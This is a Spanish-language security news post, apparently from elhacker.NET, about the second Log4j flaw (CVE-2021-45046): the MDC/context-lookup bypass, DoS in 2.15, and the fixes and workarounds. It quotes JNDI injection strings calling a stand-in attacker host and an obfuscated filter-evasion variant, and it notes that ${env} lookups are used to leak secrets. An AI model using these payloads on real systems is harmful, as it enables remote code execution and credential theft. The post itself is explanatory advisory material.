Tienda Wifi
CiudadWireless es la tienda Wifi recomendada por elhacker.NET
Tutoriales y Manuales
Entradas Mensuales
-
►
2024
(Total:
1090
)
- ► septiembre (Total: 50 )
-
►
2023
(Total:
710
)
- ► septiembre (Total: 65 )
-
►
2022
(Total:
967
)
- ► septiembre (Total: 72 )
-
▼
2021
(Total:
730
)
-
▼
diciembre
(Total:
103
)
-
Tecnología de Intel permite actualizar la BIOS de ...
-
La Universidad de Kioto en Japón pierde 77TB de da...
-
Redline Stealer es un malware que roba las contras...
-
¿Qué es un dropper? (Malware)
-
Fundador de Signal asegura que Telegram es incluso...
-
Diferencias entre el cifrado BitLocker y EFS en Wi...
-
Mejores programas para reparar, recuperar y ver in...
-
TWRP Recovery para teléfonos Android
-
Herramientas para realizar ataques Man‑in‑the‑Midd...
-
Vulnerabilidad en Azure App Service expone reposit...
-
Las 20 mejores herramientas de Hacking de 2021
-
Procesadores Intel 12th Alder Lake para el chipset...
-
Alertan de una importante Campaña Phishing vía SMS...
-
Extensiones Visual Studio Code para programar en ...
-
¿Qué es una APU (CPU + GPU) y un SoC?
-
Crean un algoritmo capaz de adivinar el 41% de las...
-
DuckDuckGo, la alternativa al buscador Google basa...
-
Instalar MacOS Big Sur en una máquina Virtual con ...
-
Editores de imágenes de vídeo gratuitos y de códig...
-
Desinstalar todas las aplicaciones no deseadas que...
-
Reparar tarjeta memoria SD dañada o estropeada
-
Instalar aplicaciones Android en Windows 11: WSATo...
-
Hackean servidores HP con CPUs AMD EPYC para minar...
-
Logrotate: administra los registros (logs) de tu s...
-
Las mejores shells para GNU/Linux
-
Glosario términos en Linux: vocabulario básico
-
Windows 10 versión 21H2 añade protecciones mejorad...
-
Instalar varios sistemas operativos autoarrancable...
-
Vulnerabilidad test de antígenos permite falsifica...
-
Actualización de seguridad importante servidor web...
-
Graves vulnerabilidades plugin SEO instalado en má...
-
Vulnerabilidades Directorio Activo permiten hackea...
-
Ministerio de Defensa de Bélgica es el primer país...
-
La memoria DDR5 es apenas un 3% más rápida que la ...
-
Actualizaciones de Windows 11 solucionan problemas...
-
Disponible distro Hacking WiFi Wifislax de origen ...
-
DuckDuckGo prepara navegador web que protegerá la ...
-
Amazon patenta una red de cámaras que reconcen a p...
-
Los mitos más comunes en ciberseguridad
-
Hospital de Asturias (España) afectado por un ataq...
-
Cable USB llamado BusKill permite borrar automátic...
-
El hackeo con Pegasus para iPhone es uno de los at...
-
Resumen de todas las vulnerabilidades de Log4j
-
Instalación LineageOS en teléfonos Android
-
Gestores de Contraseñas para Android
-
Guía SysAdmin para SELinux
-
Los mejores gestores de contraseñas gratuitos
-
Configurar servidor DLNA para reproducir música y ...
-
Instalar Kali Linux en tu teléfono móvil con NetHu...
-
pfetch, screenfetch o neofetch : mostrar informaci...
-
La estafa del supuesto familiar con la ‘maleta ret...
-
Microsoft y Dell prepararan portátiles más reparables
-
Contenedores en Firefox para mejorar privacidad al...
-
Windows Terminal será la línea de comandos por def...
-
Identificada una segunda vulnerabilidad en Log4j q...
-
Protocolo WebDav permite conectar unidad de red re...
-
Apple publica Tracker Detect para evitar que los u...
-
Volvo Cars informa una brecha de seguridad
-
Consejos de Seguridad para servidores Linux
-
Vulnerabilidad en millones chips de WiFi y Bluetoo...
-
Ataque de ransomware Lapsus al Ministerio de Salud...
-
Configurar una VPN con Wireguard
-
Distribuciones Linux para portátiles antiguos con ...
-
Juegos retro para teléfonos móviles Androd e iPhone
-
Solucionada vulnerabilidad de seguridad de Western...
-
Ladrones de coches están utilizando AirTags de App...
-
Cómo activar la autenticación en dos pasos en Goog...
-
Detenida en España por estafar al Athletic de Bilb...
-
ALPHV BlackCat es el ransomware más sofisticado de...
-
Google permitirá ejecutar juegos de Android en Win...
-
Google y Microsoft trabajan juntos para mejorar el...
-
Vulnerabilidad crítica en Apache Log4j bautizada c...
-
Nueva oferta de Microsoft 365 para los usuarios pi...
-
Nueva versión de Kali Linux 2021.4 que mejora el s...
-
Evitar que tus mails rastreen tus datos personales...
-
Cómo configurar la privacidad y seguridad en Signal
-
Google demanda a 2 rusos responsables de la botnet...
-
Bots se hacen pasar por personal de Twitter para r...
-
Importante vulnerabilidad en Grafana: actualizació...
-
Descubiertos instaladores KMSPico para activar Win...
-
Eltima SDK contiene hasta 27 múltiples vulnerabili...
-
Mozilla publica Firefox 95 con mejoras destacadas ...
-
Cómo migrar CentOS 8 a Rocky Linux 8, AlmaLinux 8 ...
-
Freesync y G-Sync: tecnologías para monitores gami...
-
Ansible permite automatizar tareas en distintos se...
-
Syncthing es una herramienta gratuita multiplatafo...
-
Curiosidades sobre el nuevo CEO de Twitter: 11.000...
-
Filtros en Linux: pipes, tuberías: cut, sort, uniq...
-
El auge del negocio de los ciberataques de denegac...
-
¿Qué son los (IoC) Indicadores de Compromiso?
-
Teléfonos iPhone de empleados del Departamento de ...
-
Mejores sistemas de rescate para recuperar fichero...
-
Ciberataque denegación de servicio distribuido DDo...
-
Hasta 9 routers de marcas muy conocidas acumulan u...
-
Plantillas y archivos RTF de phishing contienen ma...
-
Nvidia reedita la RTX 2060, ahora con 12 GB de RAM...
-
Nueva versión IPFire mejora el rendimiento IPS e i...
-
El perro robótico de Xiaomi usa Ubuntu de sistema ...
-
WiFi 7 tendrá doble de velocidad (hasta 46 Gbps) y...
-
Vulnerabilidad en impresoras HP tras 8 años afecta...
-
- ► septiembre (Total: 56 )
-
▼
diciembre
(Total:
103
)
-
►
2020
(Total:
212
)
- ► septiembre (Total: 21 )
-
►
2019
(Total:
102
)
- ► septiembre (Total: 14 )
-
►
2017
(Total:
231
)
- ► septiembre (Total: 16 )
-
►
2016
(Total:
266
)
- ► septiembre (Total: 38 )
-
►
2015
(Total:
445
)
- ► septiembre (Total: 47 )
-
►
2014
(Total:
185
)
- ► septiembre (Total: 18 )
-
►
2013
(Total:
100
)
- ► septiembre (Total: 3 )
-
►
2011
(Total:
7
)
- ► septiembre (Total: 1 )
Síguenos en:
Entradas populares
-
Después de ver qué es una vCPU y la diferencia entre núcleos (cores) e hilos en los procesadores, pasamos a explicar toda la nomenclatura d... -
iperf3 es la última versión del popular programa iperf para medir el ancho de banda entre dos o más equipos en red local o Internet . Es... -
A finales del mes de agosto hablábamos de que los legisladores estadounidense habían solicitado la investigación de TP-Link . Y así, ya ten...
Identificada una segunda vulnerabilidad en Log4j que permite Denegación de Servicio (DoS)
Se ha dado a conocer la noticia de que fue identificada otra vulnerabilidad en la implementación de búsquedas JNDI en la biblioteca Log4j 2 (CVE-2021-45046), que se manifiesta a pesar de las correcciones agregadas en la versión 2.15 e independientemente del uso de la configuración de protección «log4j2.noFormatMsgLookup».
El problema es notablemente peligroso principalmente para versiones anteriores de Log4j 2, protegidas con la bandera «noFormatMsgLookup», ya que permite eludir la protección contra vulnerabilidad anterior (Log4Shell, CVE-2021-44228), que le permite ejecutar su código en el servidor.
Para los usuarios de la versión 2.15, la operación se limita a crear condiciones para la terminación anormal de la aplicación por agotamiento de los recursos disponibles.
La vulnerabilidad solo afecta a los sistemas que utilizan la búsqueda de contexto, como ${ctx: loginId}, o plantillas de mapa de contexto de subprocesos (MDC), como% X,% mdc y% MDC, para el registro.
La operación se reduce a la creación de condiciones para enviar datos que contienen sustituciones de JNDI al registro cuando se utilizan consultas de contexto o plantillas MDC en la aplicación, que determinan las reglas para formatear la salida al registro.
Los investigadores de LunaSec señalaron que para las versiones de Log4j inferiores a 2.15, esta vulnerabilidad se puede usar como un nuevo vector para un ataque Log4Shell, lo que lleva a la ejecución del código si las expresiones ThreadContext se usan al enviar al registro, que incluye datos externos, independientemente de si la bandera está encendida para protección. «noMsgFormatLookups» o plantilla «% m {nolookups}».
La omisión de protección se reduce al hecho de que en lugar de la sustitución directa «$ {jndi:ldap://example.com/a}», esta expresión se sustituye por el valor de una variable intermedia utilizada en las reglas para formatear la salida a el registro.
Por ejemplo, si se utiliza la solicitud de contexto $ {ctx:apiversion} cuando se envía al registro, el ataque se puede llevar a cabo sustituyendo los datos «$ {jndi: ldap: //attacker.com/a}» en el valor escrito en la variable de desvío.
En la versión Log4j 2.15, la vulnerabilidad se puede utilizar para realizar ataques DoS al pasar valores a ThreadContext, lo que genera un bucle en el procesamiento del patrón de formato de salida.
Para poder tratar de dar solución a los problemas encontrados se han publicado las actualizaciones 2.16 y 2.12.2 para bloquear la vulnerabilidad. En la rama Log4j 2.16, además de las correcciones implementadas en la versión 2.15 y la vinculación de solicitudes JNDI LDAP a «localhost», por defecto la funcionalidad JNDI está completamente deshabilitada y se ha eliminado el soporte para plantillas de sustitución de mensajes.
Como solución alternativa, se sugiere eliminar la clase JndiLookup de la ruta de clases (por ejemplo, «zip -q -d log4j-core – *. Jar org /apache/logging/log4j/core/lookup/JndiLookup.class»).
En cuanto a las acciones tomadas por los diferentes proyectos:
Para Nginx, basado en el módulo njs, se ha preparado
un script que bloquea la transmisión de expresiones JNDI en encabezados
HTTP, URI y el cuerpo de las solicitudes POST. El script se puede utilizar en servidores frontend para proteger backends.
Para HAProxy , se proporcionan reglas de configuración para bloquear el funcionamiento de CVE-2021-44228.
Además de los anteriormente identificados ataques dirigidos a la formación de una red de bots para criptomoneda la minería, no fueron hechos de la explotación de una vulnerabilidad en Log4J 2 para difundir ransomware malicioso cifrar el contenido de los discos y que requieren un rescate para el descifrado.
Checkpoint ha identificado alrededor de 60 variantes diferentes de exploits utilizados para los ataques.
CloudFlare informó que los intentos de probar la manifestación de una vulnerabilidad en Log4j se identificaron el 1 de diciembre, es decir, 8 días antes de la divulgación pública del problema. Los primeros intentos de explotar la vulnerabilidad se registraron solo 9 minutos después de que se divulgara la información. El informe de CloudFlare también menciona el uso de sustituciones como «$ {env: FOO: -j} ndi: $ {lower: L} da $ {lower: P}» para omitir la máscara «jndi: ldap» y el uso de expresiones de ataque $ {env} para transferir información sobre contraseñas y claves de acceso almacenadas en variables de entorno a un servidor externo, y expresiones $ {sys} para recopilar información sobre el sistema.
Finalmente si estás interesado en poder conocer más al respecto puedes consultar el siguiente enlace.
Fuentes:
Etiquetas:
Entrada más reciente
1 comentarios :
buena informacion brujo, gracias.
Publicar un comentario
Los comentarios pueden ser revisados en cualquier momento por los moderadores.
Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.
Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.